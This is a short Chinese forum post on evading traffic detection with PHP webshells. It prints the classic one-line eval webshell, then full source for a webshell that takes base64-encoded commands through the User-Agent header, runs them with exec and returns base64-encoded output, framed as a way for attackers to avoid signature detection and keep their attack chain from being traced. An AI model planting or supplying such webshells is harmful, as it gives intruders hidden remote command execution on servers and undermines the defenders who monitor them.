PHPwebshell 流量加密分析
日前市场上的安全设备针对恶意数据流都可精细检测其特征,而常规的一句话木马、菜刀等特征过于显著。况且大部分的黑客工具都被加入特征库,因此攻击方的攻击手法很容易被针对,攻击链路亦很容易被还原。
php一句话
<?php eval(@$_POST[a]); ?>常规的一句话木马传输参数均为明文传输,很容被针对检测。
一句话webshell拜访
一句话webshell流量简单加密
常规的webshell是将所需的payload经过post进行传参,很容易被流量设备检测。如下,能够经过user_agent base64加密进行传参执行命令。
Webshell原代码:
<?php
$dd = $_SERVER[HTTP_USER_AGENT’];
//获取user_agent参数
$qq = base64_decode($dd);
//解密user_agent参数
$jjj = exec ($qq,$out);
//执行user_agent参数
for ($i=0 ;$i < count($out) ;$i++){
$ls = $ls.$out[$i]."\n";
}
echo base64_encode($ls);
//加密输入执行后的系统命令
?>
user_agent传参数据流量图顺手配上一个简单python
| 
发表于 2024-7-11 02:12:43
